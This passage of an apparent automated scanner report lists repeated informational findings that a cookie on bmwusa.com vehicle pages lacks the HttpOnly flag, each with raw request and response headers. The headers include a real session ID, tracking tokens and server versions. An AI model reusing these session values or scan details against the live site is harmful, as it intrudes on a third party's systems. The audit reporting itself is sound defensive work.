Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:37 GMT;path=/
Content-Length: 212053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.340. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750i/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:46:00 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:26:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:46:00 GMT;path=/
Content-Length: 212054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.341. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:33 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:33 GMT;path=/
Content-Length: 229185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.342. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:14 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:14 GMT;path=/
Content-Length: 229186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.343. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:47:34 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:47:34 GMT;path=/
Content-Length: 215354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.344. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:47:33 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:47:33 GMT;path=/
Content-Length: 215355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.345. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750li/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:51:30 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:31:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:51:30 GMT;path=/
Content-Length: 202064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.346. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750li/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:53:18 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:33:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:53:18 GMT;path=/
Content-Length: 212078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.347. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750li/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:38 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:38 GMT;path=/
Content-Length: 212079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.348. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:52:23 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:32:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:52:23 GMT;path=/
Content-Length: 229552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.349. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:51:40 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:31:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:51:40 GMT;path=/
Content-Length: 229553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.350. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:51 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:51 GMT;path=/
Content-Length: 215531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.351. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:44 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:44 GMT;path=/
Content-Length: 215532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.352. http://www.bmwusa.com/standard/content/vehicles/2011/7/allnew7series.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/allnew7series.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:25:58 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/allnew7series.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
